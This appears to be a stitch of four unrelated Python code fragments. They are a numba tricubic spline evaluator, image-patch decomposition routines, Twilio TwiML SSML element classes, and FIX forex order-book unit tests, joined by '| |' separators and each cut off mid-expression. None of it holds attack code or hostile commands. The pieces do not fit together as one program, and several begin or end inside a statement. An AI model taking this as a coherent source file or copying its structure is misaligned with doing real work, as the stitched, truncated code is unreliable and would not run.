Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3])
)
)
)
@njit(cache=True)
def vec_eval_cubic_spline_3_inlined_lesswork(orders, coefs, points, values, Ad, dAd):
N = points.shape[0]
M0 = orders[0]
# start0 = a[0]
# dinv0 = (orders[0]-1.0)/(b[0]-a[0])
M1 = orders[1]
# start1 = a[1]
# dinv1 = (orders[1]-1.0)/(b[1]-a[1])
M2 = orders[2]
# start2 = a[2]
# dinv2 = (orders[2]-1.0)/(b[2]-a[2])
for n in range(N):
u0 = points[n, 0]
u1 = points[n, 1]
u2 = points[n, 2]
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
i2 = int(floor(u2))
i2 = max(min(i2, M2 - 2), 0)
t2 = u2 - i2
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
tp2_0 = t2 * t2 * t2
tp2_1 = t2 * t2
tp2_2 = t2
tp2_3 = 1.0
Phi0_0 = (
Ad[0, 0] * tp0_0 + Ad[0, 1] * tp0_1 + Ad[0, 2] * tp0_2 + Ad[0, 3] * tp0_3
)
Phi0_1 = (
Ad[1, 0] * tp0_0 + Ad[1, 1] * tp0_1 + Ad[1, 2] * tp0_2 + Ad[1, 3] * tp0_3
)
Phi0_2 = (
Ad[2, 0] * tp0_0 + Ad[2, 1] * tp0_1 + Ad[2, 2] * tp0_2 + Ad[2, 3] * tp0_3
)
Phi0_3 = (
Ad[3, 0] * tp0_0 + Ad[3, 1] * tp0_1 + Ad[3, 2] * tp0_2 + Ad[3, 3] * tp0_3
)
Phi1_0 = (
Ad[0, 0] * tp1_0 + Ad[0, 1] * tp1_1 + Ad[0, 2] * tp1_2 + Ad[0, 3] * tp1_3
)
Phi1_1 = (
Ad[1, 0] * tp1_0 + Ad[1, 1] * tp1_1 + Ad[1, 2] * tp1_2 + Ad[1, 3] * tp1_3
)
Phi1_2 = (
Ad[2, 0] * tp1_0 + Ad[2, 1] * tp1_1 + Ad[2, 2] * tp1_2 + Ad[2, 3] * tp1_3
)
Phi1_3 = (
Ad[3, 0] * tp1_0 + Ad[3, 1] * tp1_1 + Ad[3, 2] * tp1_2 + Ad[3, 3] * tp1_3
)
Phi2_0 = (
Ad[0, 0] * tp2_0 + Ad[0, 1] * tp2_1 + Ad[0, 2] * tp2_2 + Ad[0, 3] * tp2_3
)
Phi2_1 = (
Ad[1, 0] * tp2_0 + Ad[1, 1] * tp2_1 + Ad[1, 2] * tp2_2 + Ad[1, 3] * tp2_3
)
Phi2_2 = (
Ad[2, 0] * tp2_0 + Ad[2, 1] * tp2_1 + Ad[2, 2] * tp2_2 + Ad[2, 3] * tp2_3
)
Phi2_3 = (
Ad[3, 0] * tp2_0 + Ad[3, 1] * tp2_1 | |
of vectors
KL1 = get_KL(abs_sources[i,:], abs_sources[j,:])
KL2 = get_KL(abs_sources[j,:], abs_sources[i,:])
# Store symmetrised KL-divergence
pair_index = next(ind)
divergences[pair_index] = KL1 + KL2
return divergences
def err(sources, source_cov):
"""
Extract the error vector, F, of all errors to be minimised in the
numerical search procedure.
Parameters
----------
sources : numpy array (floats)
The {NUM_MODES x NUM_PATCHES} array of sources.
source_cov : numpy array (floats)
The {NUM_MODES x NUM_MODES} covariance array between all modes.
Returns
-------
F : numpy array (floats)
Column vector of all errors.
"""
# The target source covariance array is the identity
I = np.eye(source_cov.shape[0])
cov_err_real = (source_cov.real - I).flatten()
cov_err_imag = source_cov.imag.flatten()
# The target symmetric divergence between all modes is 2
TARGET_DIVERGENCE = 2.
divergences = pairwise_modal_divergences(sources)
divergence_err = divergences - TARGET_DIVERGENCE
F = np.vstack((cov_err_real[:, np.newaxis],\
cov_err_imag[:, np.newaxis],\
divergence_err[:, np.newaxis]))
return F
def jac(w, centred_img_patches, F, NUM_MODES):
"""
The Jacobian of the numerical search procedure.
Parameters
----------
w : numpy array (floats)
Column vector of model weights, used to construct mapping.
centred_img_patches : numpy array (floats)
The mean-centred {p x NUM_PATCHES} array of p-elements image patches.
F : numpy array (floats)
Column vector of all errors.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
Returns
-------
J : numpy array (floats)
The Jacobian for the current error vector and set of weights.
"""
# Initialise numerical perturbation and Jacobian array
PERT = 1e-15
num_var = w.size
num_err = F.size
J = np.zeros([num_err, num_var])
# Iterate over all weights and populate Jacobian
for i in range(num_var):
w_pert = w.copy()
w_pert[i] = w[i] + PERT
inverse_mapping_pert = generate_inverse_mapping(w_pert, centred_img_patches, NUM_MODES)
sources_pert = map_patches_to_sources(inverse_mapping_pert, centred_img_patches)
source_cov_pert = cov(sources_pert)
dF = err(sources_pert, source_cov_pert) - F
J[:,[i]] = dF/PERT
return J
def progress(err_vec, iteration, total_iterations):
"""
Print the progress of the iterative numerical search procedure.
Parameters
----------
err_vec : numpy array (float)
Column vector of all errors.
iteration : int
Current iteration.
total_iterations : int
Total number of iterations.
"""
normed_err = np.linalg.norm(err_vec, 2)
perc_progress = 100*(iteration+1)/total_iterations;
# Format and print progress to the console
sys.stdout.write('\r ERROR: %.2f | PROGRESS: %d/%d [%d%%] '
% (normed_err, iteration+1, total_iterations, perc_progress)
)
sys.stdout.flush()
def save_model(SAVE_DIR, inverse_mapping, PATCH_DIM, NUM_MODES):
"""
Save model to a given directory, SAVE_DIR. If save path does not exist,
the directory will be created.
Parameters
----------
SAVE_DIR : text
Path of save directory.
inverse_mapping :numpy array (floats)
The {NUM_MODES x p} matrix transform that maps the image patches to
the desired sources.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
"""
if not os.path.isdir(SAVE_DIR):
os.mkdir(SAVE_DIR)
np.savetxt(SAVE_DIR+'real.csv', inverse_mapping.real, delimiter=',', fmt='%1.21f')
np.savetxt(SAVE_DIR+'imag.csv', inverse_mapping.imag, delimiter=',', fmt='%1.21f')
np.savetxt(SAVE_DIR+'patch_dim.csv', PATCH_DIM, delimiter=',', fmt='%i')
np.savetxt(SAVE_DIR+'num_modes.csv', np.array([NUM_MODES]), fmt='%i')
def load_model(LOAD_DIR):
"""
Load model from a given directory, LOAD_DIR.
Parameters
----------
LOAD_DIR : text
Path of load directory.
Returns
-------
inverse_mapping :numpy array (floats)
The {NUM_MODES x p} matrix transform that maps the image patches to
the desired sources.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
"""
inverse_mapping_real = np.loadtxt(LOAD_DIR+'real.csv', delimiter=',')
inverse_mapping_imag = np.loadtxt(LOAD_DIR+'imag.csv', delimiter=',')
inverse_mapping = inverse_mapping_real + 1j*inverse_mapping_imag
PATCH_DIM = list(np.loadtxt(LOAD_DIR+'patch_dim.csv').astype(int))
NUM_MODES = int(np.loadtxt(LOAD_DIR+'num_modes.csv'))
return inverse_mapping, PATCH_DIM, NUM_MODES
def extract_all_patches_from_img(I, PATCH_DIM):
"""
Beginning from the top-left corner of the image, I, extract all image
patches of shape, PATCH_DIM, that can be yielded by scanning top-to-bottom
and left-to-right. The image is not padded, and thus the total sample of
patches will generate a truncated version of I along the bottom-most and
right-most border. The number of truncated pixels is determined by the
patch size given by PATCH_DIM.
Parameters
----------
I : numpy array (floats)
Normalise image with values in range {0,1}.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
Returns
-------
all_patches : numpy array (floats)
The array of dimensions {p x n}, where p is the number of pixel values
in a patch, and n is the total number of patches that can be extracted
from I. This array thus stores all patches by column in vector form.
num_patches_in_x : int
Number of patches that can fit along the width of I.
num_patches_in_y : int
Number of patches that can fit along the height of I.
"""
# The right- and bottom-most limit for the top-left corner of patch
xrange = np.arange(I.shape[1] - PATCH_DIM[1])
yrange = np.arange(I.shape[0] - PATCH_DIM[0])
# The number of patches that can be fit into the width and height of I
num_patches_in_x = xrange.size
num_patches_in_y = yrange.size
# The total number of patches that can be extracted from I
total_num_patches = num_patches_in_x * num_patches_in_y
# Initialise array of all vectorised patches
all_patches = np.zeros([np.prod(PATCH_DIM), total_num_patches])
# Define an index iterator
def iterate_ind():
ind = 0
while True:
yield ind
ind +=1
# Iterate over all permissable locations in I and extract patches in
# row-major order, to comply with the numpy convention
i = iterate_ind()
for y in range(num_patches_in_y):
for x in range(num_patches_in_x):
patch_xinds = np.arange(xrange[x], xrange[x] + PATCH_DIM[1])
patch_yinds = np.arange(yrange[y], yrange[y] + PATCH_DIM[0])
patch_ind = next(i)
all_patches[:, patch_ind] = I[patch_yinds[:,np.newaxis], patch_xinds, :].flatten()
return all_patches, num_patches_in_x, num_patches_in_y
def im_shift_norm(I):
"""
Given an image, I, scale all pixels such that the {min, max} of the entire
image is remapped to the range {0,1}.
Parameters
----------
I : numpy array (floats)
Image array with arbitrary min and max pixel value.
Returns
-------
numpy array (floats)
Image with remapped values such that min(I) = 0 and max(I) = 1.
"""
if not I.dtype == float:
I.astype(float)
return (I - np.min(I)) / (np.max(I) - np.min(I))
def visualise_solution(I, inverse_mapping, PATCH_DIM, NUM_MODES):
"""
Given the model variables, output the stack of all modal images derived
from the absolute magnitude of the image source array, as well as the final
appropriately rescaled sum over all modal images.
Parameters
----------
I : numpy array (floats)
Normalise image into range {0,1}.
inverse_mapping : numpy array (floats)
The {NUM_MODES x p} matrix transform that maps the image patches to
the desired sources.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
Returns
-------
final_img : numpy array (floats)
The rescaled sum of all modal images.
modal_images : numpy array (floats)
The stack of all modal images, derived from the absolute values of the
source modes.
"""
# Extract all patches from the image
all_img_patches, num_patches_in_x, num_patches_in_y = \
extract_all_patches_from_img(I, PATCH_DIM)
# Centre all patches onto the mean image patch
all_img_patches_centred = mean_centred_img_patches(all_img_patches)
# Map all image patches onto source modes
all_sources = map_patches_to_sources(inverse_mapping, all_img_patches_centred)
# Initialise the stack of all source mode images
modal_images = np.zeros([num_patches_in_y, num_patches_in_x, NUM_MODES])
# Extract the images generated by the absolute magnitudes of the source modes
for i in range(NUM_MODES):
modal_images[:,:,i] = np.reshape(np.abs(all_sources[i,:]),
[num_patches_in_y, num_patches_in_x])
# Generate the summed image over all modes
summed_modes = np.sum(modal_images, axis=2)
# Shift and normalise the values of the final summed greyscale image
final_img = im_shift_norm(summed_modes)
| |
element
"""
return self.sub(words, alias=alias, **kwargs)
def w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.nest(SsmlW(words=words, role=role, **kwargs))
@deprecated_method('w')
def ssml_w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.w(words=words, role=role, **kwargs)
class SsmlPhoneme(TwiML):
""" Using Phonetic Pronunciation in <Say> """
def __init__(self, words, **kwargs):
super(SsmlPhoneme, self).__init__(**kwargs)
self.name = 'phoneme'
self.value = words
class SsmlLang(TwiML):
""" Specifying Another Language for Specific Words in <Say> """
def __init__(self, words=None, **kwargs):
super(SsmlLang, self).__init__(**kwargs)
self.name = 'lang'
if words:
self.value = words
def break_(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.nest(SsmlBreak(strength=strength, time=time, **kwargs))
@deprecated_method('break_')
def ssml_break(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.break_(strength=strength, time=time, **kwargs)
def emphasis(self, words=None, level=None, **kwargs):
"""
Create a <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.nest(SsmlEmphasis(words=words, level=level, **kwargs))
@deprecated_method('emphasis')
def ssml_emphasis(self, words=None, level=None, **kwargs):
"""
Create a <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.emphasis(words=words, level=level, **kwargs)
def lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml:lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.nest(SsmlLang(words=words, xml_lang=xml_lang, **kwargs))
@deprecated_method('lang')
def ssml_lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml:lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.lang(words=words, xml_lang=xml_lang, **kwargs)
def p(self, words=None, **kwargs):
"""
Create a <P> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <P> element
"""
return self.nest(SsmlP(words=words, **kwargs))
@deprecated_method('p')
def ssml_p(self, words=None, **kwargs):
"""
Create a <P> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <P> element
"""
return self.p(words=words, **kwargs)
def phoneme(self, words, alphabet=None, ph=None, **kwargs):
"""
Create a <Phoneme> element
:param words: Words to speak
:param alphabet: Specify the phonetic alphabet
:param ph: Specifiy the phonetic symbols for pronunciation
:param kwargs: additional attributes
:returns: <Phoneme> element
"""
return self.nest(SsmlPhoneme(words, alphabet=alphabet, ph=ph, **kwargs))
@deprecated_method('phoneme')
def ssml_phoneme(self, words, alphabet=None, ph=None, **kwargs):
"""
Create a <Phoneme> element
:param words: Words to speak
:param alphabet: Specify the phonetic alphabet
:param ph: Specifiy the phonetic symbols for pronunciation
:param kwargs: additional attributes
:returns: <Phoneme> element
"""
return self.phoneme(words, alphabet=alphabet, ph=ph, **kwargs)
def prosody(self, words=None, volume=None, rate=None, pitch=None, **kwargs):
"""
Create a <Prosody> element
:param words: Words to speak
:param volume: Specify the volume, available values: default, silent, x-soft, soft, medium, loud, x-loud, +ndB, -ndB
:param rate: Specify the rate, available values: x-slow, slow, medium, fast, x-fast, n%
:param pitch: Specify the pitch, available values: default, x-low, low, medium, high, x-high, +n%, -n%
:param kwargs: additional attributes
:returns: <Prosody> element
"""
return self.nest(SsmlProsody(words=words, volume=volume, rate=rate, pitch=pitch, **kwargs))
@deprecated_method('prosody')
def ssml_prosody(self, words=None, volume=None, rate=None, pitch=None,
**kwargs):
"""
Create a <Prosody> element
:param words: Words to speak
:param volume: Specify the volume, available values: default, silent, x-soft, soft, medium, loud, x-loud, +ndB, -ndB
:param rate: Specify the rate, available values: x-slow, slow, medium, fast, x-fast, n%
:param pitch: Specify the pitch, available values: default, x-low, low, medium, high, x-high, +n%, -n%
:param kwargs: additional attributes
:returns: <Prosody> element
"""
return self.prosody(words=words, volume=volume, rate=rate, pitch=pitch, **kwargs)
def s(self, words=None, **kwargs):
"""
Create a <S> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <S> element
"""
return self.nest(SsmlS(words=words, **kwargs))
@deprecated_method('s')
def ssml_s(self, words=None, **kwargs):
"""
Create a <S> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <S> element
"""
return self.s(words=words, **kwargs)
def say_as(self, words, interpret_as=None, role=None, **kwargs):
"""
Create a <Say-As> element
:param words: Words to be interpreted
:param interpret-as: Specify the type of words are spoken
:param role: Specify the format of the date when interpret-as is set to date
:param kwargs: additional attributes
:returns: <Say-As> element
"""
return self.nest(SsmlSayAs(words, interpret_as=interpret_as, role=role, **kwargs))
@deprecated_method('say_as')
def ssml_say_as(self, words, interpret_as=None, role=None, **kwargs):
"""
Create a <Say-As> element
:param words: Words to be interpreted
:param interpret-as: Specify the type of words are spoken
:param role: Specify the format of the date when interpret-as is set to date
:param kwargs: additional attributes
:returns: <Say-As> element
"""
return self.say_as(words, interpret_as=interpret_as, role=role, **kwargs)
def sub(self, words, alias=None, **kwargs):
"""
Create a <Sub> element
:param words: Words to be substituted
:param alias: Substitute a different word (or pronunciation) for selected text such as an acronym or abbreviation
:param kwargs: additional attributes
:returns: <Sub> element
"""
return self.nest(SsmlSub(words, alias=alias, **kwargs))
@deprecated_method('sub')
def ssml_sub(self, words, alias=None, **kwargs):
"""
Create a <Sub> element
:param words: Words to be substituted
:param alias: Substitute a different word (or pronunciation) for selected text such as an acronym or abbreviation
:param kwargs: additional attributes
:returns: <Sub> element
"""
return self.sub(words, alias=alias, **kwargs)
def w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.nest(SsmlW(words=words, role=role, **kwargs))
@deprecated_method('w')
def ssml_w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.w(words=words, role=role, **kwargs)
class SsmlP(TwiML):
""" Adding a Pause Between Paragraphs in <Say> """
def __init__(self, words=None, **kwargs):
super(SsmlP, self).__init__(**kwargs)
self.name = 'p'
if words:
self.value = words
def break_(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.nest(SsmlBreak(strength=strength, time=time, **kwargs))
@deprecated_method('break_')
def ssml_break(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.break_(strength=strength, time=time, **kwargs)
def emphasis(self, words=None, level=None, **kwargs):
"""
Create a <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.nest(SsmlEmphasis(words=words, level=level, **kwargs))
@deprecated_method('emphasis')
def ssml_emphasis(self, words=None, level=None, **kwargs):
"""
Create a <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.emphasis(words=words, level=level, **kwargs)
def lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml:lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.nest(SsmlLang(words=words, xml_lang=xml_lang, **kwargs))
@deprecated_method('lang')
def ssml_lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml:lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.lang(words=words, xml_lang=xml_lang, **kwargs)
def phoneme(self, words, alphabet=None, ph=None, **kwargs):
"""
Create a <Phoneme> element
:param words: Words to speak
:param alphabet: Specify the phonetic alphabet
:param | |
book['ask_px1'])
self.assertEqual(0, book['ask_size1'])
self.assertEqual(b'', book['ask_provider1'][0])
np.savetxt('/tmp/book_eurusd_0014.csv', book, delimiter=',', fmt='%s')
# 7.) w <- different price/feed/quantity - all combinations as in i
# USD/CAD
# bids | asks
# [0] 2300000 @ 1.37 lp1 | [0] 1200000 @ 1.39 lp0
# [1] 2300000 @ 1.36 lp0 | [1] 1200000 @ 1.40 lp1
def test_snapshot_change_all_prices_sizes_and_providers(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.47, 'size': 2200000.0, 'provider': '0', 'time': 1616965217168000},
'S0': {'entry_type': 1, 'price': 1.49, 'size': 1100000.0, 'provider': '0', 'time': 1616965217168000},
'B1': {'entry_type': 0, 'price': 1.46, 'size': 2200000.0, 'provider': '1', 'time': 1616965217168000},
'S1': {'entry_type': 1, 'price': 1.49, 'size': 1100000.0, 'provider': '1', 'time': 1616965217168000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.180|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.37|271=2300000|299=0|106=1|269=1|270=1.40|271=1200000|299=0|106=1|269=0|270=1.36|271=2300000|299=1|106=0|269=1|270=1.39|271=1200000|299=1|106=0|10=169|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217180000, 'USDCAD', [
['0', 2300000.0, 1200000.0, 1.37, 1.40, '1', '1'],
['1', 2300000.0, 1200000.0, 1.36, 1.39, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217180000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217180000, book['time'])
# check bids
self.assertEqual(1616965217180000, book['bid_time0'])
self.assertEqual(1.37, book['bid_px0'])
self.assertEqual(2300000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(1616965217180000, book['bid_time1'])
self.assertEqual(1.36, book['bid_px1'])
self.assertEqual(2300000, book['bid_size1'])
self.assertEqual(b'0', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217180000, book['ask_time0'])
self.assertEqual(1.39, book['ask_px0'])
self.assertEqual(1200000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217180000, book['ask_time1'])
self.assertEqual(1.40, book['ask_px1'])
self.assertEqual(1200000, book['ask_size1'])
self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0015.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [0] 2100000*@ 1.37 lp1 | [0] 1400000*@ 1.39 lp0
# [1] 2200000*@ 1.36 lp0 | [1] 1300000*@ 1.40 lp1
def test_snapshot_change_all_sizes(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.37, 'size': 2300000.0, 'provider': '1', 'time': 1616965217180000},
'S0': {'entry_type': 1, 'price': 1.40, 'size': 1200000.0, 'provider': '1', 'time': 1616965217180000},
'B1': {'entry_type': 0, 'price': 1.36, 'size': 2300000.0, 'provider': '0', 'time': 1616965217180000},
'S1': {'entry_type': 1, 'price': 1.39, 'size': 1200000.0, 'provider': '0', 'time': 1616965217180000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.181|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.37|271=2100000|299=0|106=1|269=1|270=1.40|271=1300000|299=0|106=1|269=0|270=1.36|271=2200000|299=1|106=0|269=1|270=1.39|271=1400000|299=1|106=0|10=170|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217181000, 'USDCAD', [
['0', 2100000.0, 1300000.0, 1.37, 1.40, '1', '1'],
['1', 2200000.0, 1400000.0, 1.36, 1.39, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217181000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217181000, book['time'])
# check bids
self.assertEqual(1616965217181000, book['bid_time0'])
self.assertEqual(1.37, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(1616965217181000, book['bid_time1'])
self.assertEqual(1.36, book['bid_px1'])
self.assertEqual(2200000, book['bid_size1'])
self.assertEqual(b'0', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217181000, book['ask_time0'])
self.assertEqual(1.39, book['ask_px0'])
self.assertEqual(1400000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217181000, book['ask_time1'])
self.assertEqual(1.40, book['ask_px1'])
self.assertEqual(1300000, book['ask_size1'])
self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
# print(self.bookbuilder.quotes['USDCAD'])
np.savetxt('/tmp/book_usdcad_0016.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [0] 2200000 @ 1.35*lp1 | [0] 1400000 @ 1.35*lp0
# [1] 2100000 @ 1.35*lp0 | [1] 1300000 @ 1.35*lp1
def test_snapshot_change_all_prices(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.37, 'size': 2100000.0, 'provider': '1', 'time': 1616965217181000},
'S0': {'entry_type': 1, 'price': 1.40, 'size': 1300000.0, 'provider': '1', 'time': 1616965217181000},
'B1': {'entry_type': 0, 'price': 1.36, 'size': 2200000.0, 'provider': '0', 'time': 1616965217181000},
'S1': {'entry_type': 1, 'price': 1.39, 'size': 1400000.0, 'provider': '0', 'time': 1616965217181000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.182|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.35|271=2100000|299=0|106=1|269=1|270=1.35|271=1300000|299=0|106=1|269=0|270=1.35|271=2200000|299=1|106=0|269=1|270=1.35|271=1400000|299=1|106=0|10=168|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217182000, 'USDCAD', [
['0', 2100000.0, 1300000.0, 1.35, 1.35, '1', '1'],
['1', 2200000.0, 1400000.0, 1.35, 1.35, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217182000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217182000, book['time'])
# check bids
self.assertEqual(1616965217182000, book['bid_time0'])
self.assertEqual(1.35, book['bid_px0'])
self.assertEqual(2200000, book['bid_size0'])
self.assertEqual(b'0', book['bid_provider0'][0])
self.assertEqual(1616965217182000, book['bid_time1'])
self.assertEqual(1.35, book['bid_px1'])
self.assertEqual(2100000, book['bid_size1'])
self.assertEqual(b'1', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217182000, book['ask_time0'])
self.assertEqual(1.35, book['ask_px0'])
# FIXME: we should sort sizes descending always...
# self.assertEqual(1400000, book['ask_size0'])
# self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217182000, book['ask_time1'])
self.assertEqual(1.35, book['ask_px1'])
# FIXME: we should sort sizes descending always...
# self.assertEqual(1300000, book['ask_size1'])
# self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0017.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [1] 2100000 @ 1.34*lp0 | [1] 1500000 @ 1.34*lp1
# [0] 2000000 @ 1.34*lp1 | [0] 1200000 @ 1.34*lp0
def test_snapshot_change_all_prices_and_sizes(self):
self.bookbuilder.quotes['USDCAD'] = {
